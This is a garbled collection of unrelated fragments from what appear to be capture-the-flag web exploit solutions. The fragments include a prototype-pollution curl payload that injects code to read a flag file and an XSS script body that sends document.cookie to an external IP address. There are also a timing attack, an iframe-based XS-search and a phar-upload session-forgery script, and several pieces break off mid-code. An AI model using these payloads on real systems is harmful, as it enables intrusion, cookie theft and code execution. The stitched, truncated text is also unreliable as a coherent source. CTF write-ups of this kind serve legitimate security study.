If you can render /debug/answer
in server-side, you can get the first flag.
Nginx denies accesses to /debug
.
location /debug {
# IP address restriction.
# TODO: add allowed IP addresses here
import javascript | |
import DataFlow::PathGraph | |
// TODO: need to add constraint of "@nguniversal/express-engine" | |
class Configuration extends TaintTracking::Configuration { | |
Configuration() { this = "Angular SSRF" } | |
// string not start with https?:// or // | |
override predicate isSource(DataFlow::Node source) { | |
source.getStringValue().regexpMatch("^(?!(https?:|//)).*$") |
curl http://10.13.37.$i:14017/config/validated/json-schema/validate -H 'content-type: application/json' --data '{"$schema":{"type":"object","properties":{"__proto__":{"type":"object","properties":{"outputFunctionName":{"type":"string","default":"x;var buf = Buffer.alloc(128);var fs = process.mainModule.require(`fs`);var fd=fs.openSync(`/fl`+`ag`);fs.readSync(fd, buf, 0, 128);fs.closeSync(fd);return buf.toString();//x"},"path":{"type":"string","default":"/foo"}}}}}}' |
<script> | |
setTimeout(() => { | |
(new Image()).src='/start'; | |
var start = performance.now(); | |
fetch("https://www.materialui.co/materialIcons/navigation/close_black_72x72.png", { | |
mode: "no-cors", | |
credentials: "include" | |
}).then((response) => { | |
var end = performance.now(); |
1a2 | |
> | |
222,223d222 | |
< do_action('wp_print_scripts'); | |
< | |
225,228d223 | |
< | |
< # remove theCode | |
< $content = preg_replace('/<p class="theCode[^<]+<\/p>/', '', $content); | |
< |
#!/usr/local/bin/zsh | |
command=( | |
#cookie "PHPSESSID" "rsha06bn3700l9jtvpvsottf7q" | |
#header "Content*" "compressed" | |
header "HTTP/ 999 " "found" | |
#header "HTTP/0.9 " "OK" | |
#header "Connection" "close" | |
body "<script\r\n>location.href='//35.209.128.35:12345/?'+document.cookie\r\n</script" b | |
hello 1 1 |
#!/usr/bin/env python3 | |
import random | |
import sys | |
FLAG_LENGTH = 42 | |
OPS_CURSOR = 0 | |
RESULT_CURSOR = 0 | |
TIME = 157763354 |
/*'/*"+/.*/+target.exploit//
<?php | |
$prefix = ""; | |
if ($_GET["prefix"]) { $prefix = $_GET["prefix"]; } | |
for ($i = 20; $i <= 126; $i++) { | |
echo "<iframe id='" . chr($i) . "' src='http://challenges.fbctf.com:8082/search?query=fb%7b" . urlencode($prefix . chr($i)) ."'></iframe>"; | |
} | |
?> | |
<script> | |
Array.from(document.querySelectorAll('iframe')).forEach(f => { |
IMAGE=$(curl http://153.127.202.154:1002/upload.php -F "file=@test4.phar.png" -vvv 2>&1 | grep Set-Cookie | sed -r 's/^.*session=([^.]+).*$/\1/' | base64 -d 2>/dev/null | sed -r 's/^.*avatar":"([^"]+).*$/\1/') | |
echo $IMAGE | |
wget http://153.127.202.154:1002/uploads/$IMAGE | |
node -e "function btoa(str) { var buffer; if (Buffer.isBuffer(str)) { buffer = str; } else { buffer = new Buffer(str.toString(), 'binary'); } return buffer.toString('base64');};console.log('session=' + btoa('{\"name\":\"AAAAAAAAAAAAAAAA\",\"flash\":{\"type\":\"error\",\"message\":\"Uploaded file is not PNG format.\"},\"theme\":\"phar://./uploads/$IMAGE/exploit\"}').replace(/=/g,'') + '.JDJ5JDEwJC5LS1h0UnlUbC5OeHhWVHdFRXovZ095N2taU3NPTXBhTDRnMi4yNXkwMnQ3eHp1dW16SzVt')" > cookie | |
COOKIE=$(cat cookie) | |
echo $COOKIE |